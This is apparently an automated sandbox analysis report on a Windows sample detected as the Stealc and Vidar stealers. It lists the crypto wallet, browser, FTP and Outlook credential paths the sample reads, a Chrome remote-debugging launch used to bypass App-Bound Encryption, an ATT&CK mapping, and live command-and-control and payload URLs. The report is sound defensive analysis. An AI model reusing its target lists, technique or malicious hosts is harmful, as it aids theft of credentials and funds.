Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2152563709.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2662760280.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40C40 sqlite3_bind_zeroblob,	0_2_6CB40C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40D60 sqlite3_bind_parameter_name,	0_2_6CB40D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA68EA0 sqlite3_clear_bindings,	0_2_6CA68EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CB40B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA66410 bind,WSAGetLastError,	0_2_6CA66410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA660B0 listen,WSAGetLastError,	0_2_6CA660B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6C030 sqlite3_bind_parameter_count,	0_2_6CA6C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA66070 PR_Listen,	0_2_6CA66070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CA6C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9F22D0 sqlite3_bind_blob,	0_2_6C9F22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA663C0 PR_Bind,	0_2_6CA663C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	112 Process Injection	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	12 Software Packing	NTDS	237 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	651 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	241 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	39%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://185.215.113.206/68b591d6548ec281/mozglue.dllw3	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.php~Q=	100%	Avira URL Cloud	malware
http://31.41.244.11/files/random.exe1	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/nss3.dllm0	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ	100%	Avira URL Cloud	malware
http://31.41.244.11/files/random.exe06ncoded	0%	Avira URL Cloud	safe
http://31.41.244.11/files/random.exe3b31	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpZd	100%	Avira URL Cloud	malware
http://31.41.244.11/files/random.exephp	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpSd	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpY	100%	Avira URL Cloud	malware
http://31.41.244.11/A	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fg.microsoft.map.fastly.net	199.232.210.172	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.165.220.106	true	false	high
www.google.com	142.250.181.100	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.97	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
https://sb.scorecardresearch.com/b2?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
http://185.215.113.206/	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239370639606_1UY6VCV79VNDR5KH5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732342188666&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732342194922&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239340418546_1PNT9LCA42P8D0DO5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
185.215.113.206/c4becf79229cb002.php	false	high
https://bzib.nelreports.net/api/report?cat=bingbusiness	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239317301618_18EK60OU3ULIWMD9V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://assets.msn.com/statics/icons/favicon_newtabpage.png	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239370639702_1LY06F7YB2ZF9D3G5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732342194071&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732342194079&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239357296555_1NQZO136EN197N4N8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://sb.scorecardresearch.com/b?rn=1732342188669&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=076D87ACE96D60880BB292ECE84461D8&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239370639595_1MX6CE6U5QJ1LNKB2&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	false		high
https://c.msn.com/	2cc80dabc69f58b6_1.12.dr	false		high
